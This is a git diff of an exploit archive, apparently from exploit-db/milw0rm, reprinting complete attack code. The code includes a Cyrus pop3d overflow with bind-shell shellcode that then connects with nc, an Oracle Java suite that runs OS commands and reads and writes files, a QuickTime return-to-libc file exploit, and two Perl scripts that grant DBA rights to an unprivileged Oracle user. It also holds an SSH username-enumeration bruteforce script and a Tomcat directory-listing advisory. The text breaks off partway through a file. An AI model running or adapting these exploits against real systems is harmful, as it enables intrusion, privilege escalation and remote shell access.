puts "--- ./exploit [host] [options]" - exit - -when 1 - sock = TCPSocket.new(ARGV[0], "pop3") - -when 2 - sock = TCPSocket.new(ARGV[0], "pop3") - ret = ARGV[1].hex - -end - -ret = (targets['linux 2.6'].hex) - -puts "<- " + banner = sock.gets -puts "-> sending USER command" -printf " injecting shellcode: %d bytes\n", shellcode.length - - -#this alignment stuff should probably be cleaned up its kinda icky# - -evil_buff = "USER " -evil_buff <<"\x90" * 265 #(290 - shellcode.length) - -evil_buff << ([ret].pack('V')) * 2 #return address -evil_buff <<"\x90" * (250 - shellcode.length) -evil_buff << shellcode -evil_buff <<"\x90" * (29) -ret = ret - 277 
-evil_buff << ([ret].pack('V')) * 4 #0x080fd204 -evil_buff <<"\r\n" - -sock.send(evil_buff, 0) - -sleep 9 -puts " attempting to connect to #{ARGV[0]} port 4444" - -cmd = "nc #{ARGV[0]} 4444" -system(cmd) - -sock.close - -# milw0rm.com [2006-07-21] +#!/usr/bin/ruby +# +# cyrus-imapd pop3d exploit +# by bannedit +# +# 05/23/2006 +# This exploit takes advantage of a stack based overflow. +# Once the stack corruption has occured it is possible +# to overwrite a pointer which is later used for a memcpy +# this gives us a write anything anywhere condition similar +# to a format string vulnerability. +# +# I choose to overwrite the GOT table with my shellcode and +# return to it. This defeats the VA random patch and possibly +# other stack protection features. +# +# tested on gentoo-sources linux 2.6.16 + + + +require 'socket' + +#will add targets for other linux distros +targets = { 'linux 2.6' => '0x080fd318', 'linux 2.6 Hardened' => '', 'freebsd' => '' } + + +#metasploit bind shellcode by skape 84 bytes port 4444# + +shellcode = +"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"+ +"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"+ +"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"+ +"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"+ +"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+ +"\x89\xe1\xcd\x80" + + +puts "--[cyrus imapd pop3 popsubfolders exploit" +puts "----[by bannedit" +puts "-----------------------------------------" + +case ARGV.length + +when 0 + puts "--- ./exploit [host] [options]" + exit + +when 1 + sock = TCPSocket.new(ARGV[0], "pop3") + +when 2 + sock = TCPSocket.new(ARGV[0], "pop3") + ret = ARGV[1].hex + +end + +ret = (targets['linux 2.6'].hex) + +puts "<- " + banner = sock.gets +puts "-> sending USER command" +printf " injecting shellcode: %d bytes\n", shellcode.length + + +#this alignment stuff should probably be cleaned up its kinda icky# + +evil_buff = "USER " 
+evil_buff <<"\x90" * 265 #(290 - shellcode.length) + +evil_buff << ([ret].pack('V')) * 2 #return address +evil_buff <<"\x90" * (250 - shellcode.length) +evil_buff << shellcode +evil_buff <<"\x90" * (29) +ret = ret - 277 +evil_buff << ([ret].pack('V')) * 4 #0x080fd204 +evil_buff <<"\r\n" + +sock.send(evil_buff, 0) + +sleep 9 +puts " attempting to connect to #{ARGV[0]} port 4444" + +cmd = "nc #{ARGV[0]} 4444" +system(cmd) + +sock.close + +# milw0rm.com [2006-07-21] diff --git a/platforms/multiple/remote/2061.txt b/platforms/multiple/remote/2061.txt index 8341d218c..7d446eb0a 100755 --- a/platforms/multiple/remote/2061.txt +++ b/platforms/multiple/remote/2061.txt 
@@ -1,23 +1,23 @@ -ScanAlert Security Advisory - http://www.scanalert.com - -Directory Listing in Apache Tomcat 5.x.x - -Date: 07/21/2006 -Vendor: Apache -Package: Tomcat -Versions: 5.x.x (5.0.28, 5.5.12, 5.5.9, and 5.5.7 . Confirmed) -Credit: ScanAlert.s Enterprise Services Team. - -Overview: -Apache Tomcat is the servlet container that is used in the official Reference Implementation -for the Java Servlet and JavaServer Pages technologies. - -Vulnerabilities: -Apache Tomcat can be forced to reveal a complete directory listing for any directory by requesting -a mapped file extension prepended with a semicolon, a reserved character. The file does not need to exist. - -Examples: -http://www.sitexyz.com/;index.jsp -http://www.sitexyz.com/help/;help.do - -# milw0rm.com [2006-07-23] +ScanAlert Security Advisory - http://www.scanalert.com + +Directory Listing in Apache Tomcat 5.x.x + +Date: 07/21/2006 +Vendor: Apache +Package: Tomcat +Versions: 5.x.x (5.0.28, 5.5.12, 5.5.9, and 5.5.7 . Confirmed) +Credit: ScanAlert.s Enterprise Services Team. + +Overview: +Apache Tomcat is the servlet container that is used in the official Reference Implementation +for the Java Servlet and JavaServer Pages technologies. + +Vulnerabilities: +Apache Tomcat can be forced to reveal a complete directory listing for any directory by requesting +a mapped file extension prepended with a semicolon, a reserved character. The file does not need to exist. + +Examples: +http://www.sitexyz.com/;index.jsp +http://www.sitexyz.com/help/;help.do + +# milw0rm.com [2006-07-23] diff --git a/platforms/multiple/remote/2784.html b/platforms/multiple/remote/2784.html index 9a4c2f7e4..d48943b9e 100755 --- a/platforms/multiple/remote/2784.html +++ b/platforms/multiple/remote/2784.html @@ -1,54 +1,54 @@ - - -Put /etc/passwd -Get .bashrc - - -# milw0rm.com [2006-11-14] + + +Put /etc/passwd +Get .bashrc + + +# milw0rm.com [2006-11-14] 
diff --git a/platforms/multiple/remote/2837.sql b/platforms/multiple/remote/2837.sql
index f73003f1e..af496dd9b 100755
--- a/platforms/multiple/remote/2837.sql
+++ b/platforms/multiple/remote/2837.sql
@@ -1,100 +1,100 @@ --- --- $Id: raptor_oraexec.sql,v 1.2 2006/11/23 23:40:16 raptor Exp $ --- --- raptor_oraexec.sql - java exploitation suite for oracle --- Copyright (c) 2006 Marco Ivaldi --- --- This is an exploitation suite for Oracle written in Java. Use it to --- read/write files and execute OS commands with the privileges of the --- RDBMS, if you have the required permissions (DBA role and SYS:java). --- --- "The Oracle RDBMS could almost be considered as a shell like bash or the --- Windows Command Prompt; it's not only capable of storing data but can also --- be used to completely access the file system and run operating system --- commands" -- David Litchfield (http://www.databasesecurity.com/) --- --- Usage example: --- $ sqlplus "/ as sysdba" --- [...] --- SQL> @raptor_oraexec.sql --- [...] --- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa'); --- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb'); --- SQL> exec dbms_java.set_output(2000); --- SQL> set serveroutput on; --- SQL> exec javareadfile('/tmp/mytest'); --- /bin/ls -l > /tmp/aaa --- /bin/ls -l / >/tmp/bbb --- SQL> exec javacmd('/bin/sh /tmp/mytest'); --- SQL> !sh --- $ ls -rtl /tmp/ --- [...] --- -rw-r--r-- 1 oracle system 45 Nov 22 12:20 mytest --- -rw-r--r-- 1 oracle system 1645 Nov 22 12:20 aaa --- -rw-r--r-- 1 oracle system 8267 Nov 22 12:20 bbb --- [...] 
--- - -create or replace and resolve java source named "oraexec" as -import java.lang.*; -import java.io.*; -public class oraexec -{ - /* - * Command execution module - */ - public static void execCommand(String command) throws IOException - { - Runtime.getRuntime().exec(command); - } - - /* - * File reading module - */ - public static void readFile(String filename) throws IOException - { - FileReader f = new FileReader(filename); - BufferedReader fr = new BufferedReader(f); - String text = fr.readLine(); - while (text != null) { - System.out.println(text); - text = fr.readLine(); - } - fr.close(); - } - - /* - * File writing module - */ - public static void writeFile(String filename, String line) throws IOException - { - FileWriter f = new FileWriter(filename, true); /* append */ - BufferedWriter fw = new BufferedWriter(f); - fw.write(line); - fw.write("\n"); - fw.close(); - } -} -/ - --- usage: exec javacmd('command'); -create or replace procedure javacmd(p_command varchar2) as -language java -name 'oraexec.execCommand(java.lang.String)'; -/ - --- usage: exec dbms_java.set_output(2000); --- set serveroutput on; --- exec javareadfile('/path/to/file'); -create or replace procedure javareadfile(p_filename in varchar2) as -language java -name 'oraexec.readFile(java.lang.String)'; -/ - --- usage: exec javawritefile('/path/to/file', 'line to append'); -create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as -language java -name 'oraexec.writeFile(java.lang.String, java.lang.String)'; -/ - --- milw0rm.com [2006-11-23] +-- +-- $Id: raptor_oraexec.sql,v 1.2 2006/11/23 23:40:16 raptor Exp $ +-- +-- raptor_oraexec.sql - java exploitation suite for oracle +-- Copyright (c) 2006 Marco Ivaldi +-- +-- This is an exploitation suite for Oracle written in Java. Use it to +-- read/write files and execute OS commands with the privileges of the +-- RDBMS, if you have the required permissions (DBA role and SYS:java). 
+-- +-- "The Oracle RDBMS could almost be considered as a shell like bash or the +-- Windows Command Prompt; it's not only capable of storing data but can also +-- be used to completely access the file system and run operating system +-- commands" -- David Litchfield (http://www.databasesecurity.com/) +-- +-- Usage example: +-- $ sqlplus "/ as sysdba" +-- [...] +-- SQL> @raptor_oraexec.sql +-- [...] +-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa'); +-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb'); +-- SQL> exec dbms_java.set_output(2000); +-- SQL> set serveroutput on; +-- SQL> exec javareadfile('/tmp/mytest'); +-- /bin/ls -l > /tmp/aaa +-- /bin/ls -l / >/tmp/bbb +-- SQL> exec javacmd('/bin/sh /tmp/mytest'); +-- SQL> !sh +-- $ ls -rtl /tmp/ +-- [...] +-- -rw-r--r-- 1 oracle system 45 Nov 22 12:20 mytest +-- -rw-r--r-- 1 oracle system 1645 Nov 22 12:20 aaa +-- -rw-r--r-- 1 oracle system 8267 Nov 22 12:20 bbb +-- [...] +-- + +create or replace and resolve java source named "oraexec" as +import java.lang.*; +import java.io.*; +public class oraexec +{ + /* + * Command execution module + */ + public static void execCommand(String command) throws IOException + { + Runtime.getRuntime().exec(command); + } + + /* + * File reading module + */ + public static void readFile(String filename) throws IOException + { + FileReader f = new FileReader(filename); + BufferedReader fr = new BufferedReader(f); + String text = fr.readLine(); + while (text != null) { + System.out.println(text); + text = fr.readLine(); + } + fr.close(); + } + + /* + * File writing module + */ + public static void writeFile(String filename, String line) throws IOException + { + FileWriter f = new FileWriter(filename, true); /* append */ + BufferedWriter fw = new BufferedWriter(f); + fw.write(line); + fw.write("\n"); + fw.close(); + } +} +/ + +-- usage: exec javacmd('command'); +create or replace procedure javacmd(p_command varchar2) as +language java +name 
'oraexec.execCommand(java.lang.String)'; +/ + +-- usage: exec dbms_java.set_output(2000); +-- set serveroutput on; +-- exec javareadfile('/path/to/file'); +create or replace procedure javareadfile(p_filename in varchar2) as +language java +name 'oraexec.readFile(java.lang.String)'; +/ + +-- usage: exec javawritefile('/path/to/file', 'line to append'); +create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as +language java +name 'oraexec.writeFile(java.lang.String, java.lang.String)'; +/ + +-- milw0rm.com [2006-11-23] diff --git a/platforms/multiple/remote/300.c b/platforms/multiple/remote/300.c index 64897881d..0dd81a259 100755 --- a/platforms/multiple/remote/300.c +++ b/platforms/multiple/remote/300.c @@ -1052,6 +1052,6 @@ int sh(int sockfd) } exit(0); } - - -// milw0rm.com [2004-06-25] + + +// milw0rm.com [2004-06-25] diff --git a/platforms/multiple/remote/3064.rb b/platforms/multiple/remote/3064.rb index 73589aafb..b99f34278 100755 --- a/platforms/multiple/remote/3064.rb +++ b/platforms/multiple/remote/3064.rb 
@@ -1,62 +1,62 @@ -#!/usr/bin/ruby -# Copyright (c) LMH -# Kevin Finisterre -# -# Notes: -# Our command string is loaded on memory at a static address normally, -# but this depends on execution method and the string length. The address set in this exploit will -# be likely successful if we open the resulting QTL file directly, without having an -# instance of Quicktime running. Although, when using another method and string, you'll need -# to find the address. -# For 100% reliable exploitation you can always use the /bin/sh address, -# but that's not as a cool as having your box welcoming the new year. -# Do whatever you prefer. That said, enjoy. -# -# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html - -# Command string: Use whatever you like. -# Remember that changing this will also need a change of the target address for system(), -# unless string length is the same. -CMD_STRING = "/usr/bin/say Happy new year shit bag" - -# Mac OS X 10.4.8 (8L2127) -EBP_ADDR = 0xdeadbabe -SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back -SETUID_ADDR = 0x900334f0 -CURL_ADDR = 0x916c24bc # /usr/bin/curl -SHELL_ADDR = 0x918bef3a # /bin/sh -CMDSTR_ADDR = [ - SHELL_ADDR, # 0 addr to static /bin/sh (lame) - 0x17a053c, # 1 addr to our command string (cool) :> (change as necessary) - 0xbabeface, # 2 bogus addr for testing. - CURL_ADDR # 3 addr to '/usr/bin/curl' - ] - -# Payload -HAPPY = ("A" * 299) + - [EBP_ADDR].pack("V") + - [SYSTEM_ADDR].pack("V") + - [SETUID_ADDR].pack("V") + - [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr - -# Sleds: not necessary if using /bin/bash addr or other built-in addresses. 
-# although, for using our own fu, we need to spray some data for better reliability -# the goal is causing allocation of large heap chunks -NEW = ("\x90" * 30000) + CMD_STRING # feed the heap -YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go -APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more -BOYZ = ("\x90" * 30000) + "FOOM" # and more - -# QTL output template -QTL_CONTENT = "" + - "" + - "\n" - -target_file = File.open("pwnage.qtl", "w+") { |f| - f.print(QTL_CONTENT) - f.close -} - -# milw0rm.com [2007-01-01] +#!/usr/bin/ruby +# Copyright (c) LMH +# Kevin Finisterre +# +# Notes: +# Our command string is loaded on memory at a static address normally, +# but this depends on execution method and the string length. The address set in this exploit will +# be likely successful if we open the resulting QTL file directly, without having an +# instance of Quicktime running. Although, when using another method and string, you'll need +# to find the address. +# For 100% reliable exploitation you can always use the /bin/sh address, +# but that's not as a cool as having your box welcoming the new year. +# Do whatever you prefer. That said, enjoy. +# +# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html + +# Command string: Use whatever you like. +# Remember that changing this will also need a change of the target address for system(), +# unless string length is the same. +CMD_STRING = "/usr/bin/say Happy new year shit bag" + +# Mac OS X 10.4.8 (8L2127) +EBP_ADDR = 0xdeadbabe +SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back +SETUID_ADDR = 0x900334f0 +CURL_ADDR = 0x916c24bc # /usr/bin/curl +SHELL_ADDR = 0x918bef3a # /bin/sh +CMDSTR_ADDR = [ + SHELL_ADDR, # 0 addr to static /bin/sh (lame) + 0x17a053c, # 1 addr to our command string (cool) :> (change as necessary) + 0xbabeface, # 2 bogus addr for testing. 
+ CURL_ADDR # 3 addr to '/usr/bin/curl' + ] + +# Payload +HAPPY = ("A" * 299) + + [EBP_ADDR].pack("V") + + [SYSTEM_ADDR].pack("V") + + [SETUID_ADDR].pack("V") + + [CMDSTR_ADDR[1]].pack("V") # change array index for using diff. addr + +# Sleds: not necessary if using /bin/bash addr or other built-in addresses. +# although, for using our own fu, we need to spray some data for better reliability +# the goal is causing allocation of large heap chunks +NEW = ("\x90" * 30000) + CMD_STRING # feed the heap +YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go +APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more +BOYZ = ("\x90" * 30000) + "FOOM" # and more + +# QTL output template +QTL_CONTENT = "" + + "" + + "\n" + +target_file = File.open("pwnage.qtl", "w+") { |f| + f.print(QTL_CONTENT) + f.close +} + +# milw0rm.com [2007-01-01] diff --git a/platforms/multiple/remote/311.pl b/platforms/multiple/remote/311.pl index 0926f426b..77b2a922d 100755 --- a/platforms/multiple/remote/311.pl +++ b/platforms/multiple/remote/311.pl @@ -137,6 +137,6 @@ sub HexDump push(@line, sprintf("%02X", $val)); } print join(' ', @line), "\n"; -} - -# milw0rm.com [2004-07-10] +} + +# milw0rm.com [2004-07-10] diff --git a/platforms/multiple/remote/3269.pl b/platforms/multiple/remote/3269.pl index 4d0afc750..10a9f77d3 100755 --- a/platforms/multiple/remote/3269.pl +++ b/platforms/multiple/remote/3269.pl 
@@ -1,120 +1,120 @@ -#!/usr/bin/perl -# -# Remote Oracle dbms_export_extension exploit (any version) -# Grant or revoke dba permission to unprivileged user -# -# Tested on Oracle 10g - Release 10.2.0.1.0 -# Oracle 9i - Release 9.2.0.2.0 -# -# REF: http://www.securityfocus.com/bid/17699 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -use warnings; -use strict; -use DBI; -use DBD::Oracle; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:gr'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; - -my $sqlcmd = "GRANT DBA TO $user"; - -print "[-] Wait...\n"; -$dbh->{RaiseError} = 1; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -$dbh->do( qq{ -CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS -FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 -VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER; -END; -} ); - -print "[-] Building evil package\n"; - -$dbh->do(qq{ -CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS -FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 -VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE '$sqlcmd'; -COMMIT; -RETURN(1); -END; -END; -} ); - -print "[-] Finishing evil package\n"; - -$dbh->do(qq{ -DECLARE -INDEX_NAME VARCHAR2(200); 
-INDEX_SCHEMA VARCHAR2(200); -TYPE_NAME VARCHAR2(200); -TYPE_SCHEMA VARCHAR2(200); -VERSION VARCHAR2(200); -NEWBLOCK PLS_INTEGER; -GMFLAGS NUMBER; -v_Return VARCHAR2(200); -BEGIN -INDEX_NAME := 'A1'; -INDEX_SCHEMA := '$user'; -TYPE_NAME := 'BUNKERPKG'; -TYPE_SCHEMA := '$user'; -VERSION := ''; -GMFLAGS := 1; -v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( -INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME -=> TYPE_NAME, -TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => -NEWBLOCK, GMFLAGS => GMFLAGS -); -END; -} ); - -print "[-] YOU GOT THE POWAH!!\n"; - -$dbh->disconnect; - -exit; - -# milw0rm.com [2007-02-05] +#!/usr/bin/perl +# +# Remote Oracle dbms_export_extension exploit (any version) +# Grant or revoke dba permission to unprivileged user +# +# Tested on Oracle 10g - Release 10.2.0.1.0 +# Oracle 9i - Release 9.2.0.2.0 +# +# REF: http://www.securityfocus.com/bid/17699 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +use warnings; +use strict; +use DBI; +use DBD::Oracle; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:gr'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; + +my $sqlcmd = "GRANT DBA TO $user"; + +print "[-] Wait...\n"; +$dbh->{RaiseError} = 1; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + 
exit; +} + +$dbh->do( qq{ +CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS +FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 +VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER; +END; +} ); + +print "[-] Building evil package\n"; + +$dbh->do(qq{ +CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS +FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 +VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE '$sqlcmd'; +COMMIT; +RETURN(1); +END; +END; +} ); + +print "[-] Finishing evil package\n"; + +$dbh->do(qq{ +DECLARE +INDEX_NAME VARCHAR2(200); +INDEX_SCHEMA VARCHAR2(200); +TYPE_NAME VARCHAR2(200); +TYPE_SCHEMA VARCHAR2(200); +VERSION VARCHAR2(200); +NEWBLOCK PLS_INTEGER; +GMFLAGS NUMBER; +v_Return VARCHAR2(200); +BEGIN +INDEX_NAME := 'A1'; +INDEX_SCHEMA := '$user'; +TYPE_NAME := 'BUNKERPKG'; +TYPE_SCHEMA := '$user'; +VERSION := ''; +GMFLAGS := 1; +v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( +INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME +=> TYPE_NAME, +TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK => +NEWBLOCK, GMFLAGS => GMFLAGS +); +END; +} ); + +print "[-] YOU GOT THE POWAH!!\n"; + +$dbh->disconnect; + +exit; + +# milw0rm.com [2007-02-05] diff --git a/platforms/multiple/remote/3303.sh b/platforms/multiple/remote/3303.sh index 0520d12f6..5eee236ee 100755 --- a/platforms/multiple/remote/3303.sh +++ b/platforms/multiple/remote/3303.sh 
@@ -1,87 +1,87 @@ -#!/bin/bash - -# -# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ -# -# raptor_sshtime - [Open]SSH remote timing attack exploit -# Copyright (c) 2006 Marco Ivaldi -# -# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately -# sends an error message when a user does not exist, which allows remote -# attackers to determine valid usernames via a timing attack (CVE-2003-0190). -# -# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, -# and possibly under limited configurations, allows remote attackers to -# determine valid usernames via timing discrepancies in which responses take -# longer for valid usernames than invalid ones, as demonstrated by sshtime. -# NOTE: as of 20061014, it appears that this issue is dependent on the use of -# manually-set passwords that causes delays when processing /etc/shadow due to -# an increased number of rounds (CVE-2006-5229). -# -# This is a simple shell script based on expect meant to remotely analyze -# timing differences in sshd "Permission denied" replies. Depending on OpenSSH -# version and configuration, it may lead to disclosure of valid usernames. -# -# Usage example: -# [make sure the target hostkey has been approved before] -# ./sshtime 192.168.0.1 dict.txt -# - -# Some vars -port=22 - -# Command line -host=$1 -dict=$2 - -# Local functions -function head() { - echo "" - echo "raptor_sshtime - [Open]SSH remote timing attack exploit" - echo "Copyright (c) 2006 Marco Ivaldi " - echo "" -} - -function foot() { - echo "" - exit 0 -} - -function usage() { - head - echo "[make sure the target hostkey has been approved before]" - echo "" - echo "usage : ./sshtime " - echo "example: ./sshtime 192.168.0.1 dict.txt" - foot -} - -function notfound() { - head - echo "error : expect interpreter not found!" - foot -} - -# Check if expect is there -expect=`which expect 2>/dev/null` -if [ $? 
-ne 0 ]; then - notfound -fi - -# Input control -if [ -z "$2" ]; then - usage -fi - -# Perform the bruteforce attack -head - -for user in `cat $dict` -do - echo -ne "$user@$host\t\t" - (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real -done - -foot - -# milw0rm.com [2007-02-13] +#!/bin/bash + +# +# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $ +# +# raptor_sshtime - [Open]SSH remote timing attack exploit +# Copyright (c) 2006 Marco Ivaldi +# +# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately +# sends an error message when a user does not exist, which allows remote +# attackers to determine valid usernames via a timing attack (CVE-2003-0190). +# +# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, +# and possibly under limited configurations, allows remote attackers to +# determine valid usernames via timing discrepancies in which responses take +# longer for valid usernames than invalid ones, as demonstrated by sshtime. +# NOTE: as of 20061014, it appears that this issue is dependent on the use of +# manually-set passwords that causes delays when processing /etc/shadow due to +# an increased number of rounds (CVE-2006-5229). +# +# This is a simple shell script based on expect meant to remotely analyze +# timing differences in sshd "Permission denied" replies. Depending on OpenSSH +# version and configuration, it may lead to disclosure of valid usernames. 
+# +# Usage example: +# [make sure the target hostkey has been approved before] +# ./sshtime 192.168.0.1 dict.txt +# + +# Some vars +port=22 + +# Command line +host=$1 +dict=$2 + +# Local functions +function head() { + echo "" + echo "raptor_sshtime - [Open]SSH remote timing attack exploit" + echo "Copyright (c) 2006 Marco Ivaldi " + echo "" +} + +function foot() { + echo "" + exit 0 +} + +function usage() { + head + echo "[make sure the target hostkey has been approved before]" + echo "" + echo "usage : ./sshtime " + echo "example: ./sshtime 192.168.0.1 dict.txt" + foot +} + +function notfound() { + head + echo "error : expect interpreter not found!" + foot +} + +# Check if expect is there +expect=`which expect 2>/dev/null` +if [ $? -ne 0 ]; then + notfound +fi + +# Input control +if [ -z "$2" ]; then + usage +fi + +# Perform the bruteforce attack +head + +for user in `cat $dict` +do + echo -ne "$user@$host\t\t" + (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real +done + +foot + +# milw0rm.com [2007-02-13] diff --git a/platforms/multiple/remote/3358.pl b/platforms/multiple/remote/3358.pl index 4f2470a2d..4e0c2a49f 100755 --- a/platforms/multiple/remote/3358.pl +++ b/platforms/multiple/remote/3358.pl 
@@ -1,125 +1,125 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPW$WORKER.MAIN exploit (10g) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/archive/1/440439 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Thu Feb 22 17:48:27 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-worker.pl line 94. -# [-] Done! -# -# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil function... -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG -# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 -# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 -# ORA-00931: missing identifier -# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 -# ORA-06512: at line 1 -# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 -# ORA-06512: at "SYS.KUPW$WORKER", line 13468 -# ORA-06512: at "SYS.KUPW$WORKER", line 5810 -# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] -# ORA-06512: at "SYS.KUPW$WORKER", line 1243 -# ORA-31626: job does not exist -# ORA-39086: cannot retrieve job information -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.KUPW$WORKER.MAIN(''' AND 0=BUNKER.own--',''); -# END;"] at kupw-worker.pl line 116. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! 
